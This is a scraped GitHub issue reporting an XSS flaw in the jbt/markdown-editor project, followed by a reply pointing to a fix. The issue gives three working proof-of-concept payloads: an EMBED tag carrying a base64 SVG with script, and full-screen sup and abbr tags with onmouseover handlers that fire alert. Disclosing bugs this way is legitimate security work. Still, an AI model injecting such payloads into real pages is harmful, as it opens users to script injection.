markdown-editor icon indicating copy to clipboard operation
markdown-editor copied to clipboard
verified publisher icon jbt

XSS vulnerability on <abbr> and <sup><EMBED> label

Open j1nse opened this issue 6 years ago • 1 comments

This label and attack vector will cause XSS. payload: <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIGlkPSJ4c3MiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydCgieHNzISIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <sup style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('xss')">sup</sup> <abbr style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('xss')">abbr</abbr> if you type the payload,the xss vulnerability will be triggered. xss xss2 xss3

j1nse avatar Aug 05 '19 09:08 j1nse

Hi @shequ123, thanks for creating an issue for this! I opened a pull request implementing changes to fix these problems and it correctly blocks those scenarios from happening in the editor. Pull request: https://github.com/jbt/markdown-editor/pull/110

ColeBennett avatar Oct 25 '19 23:10 ColeBennett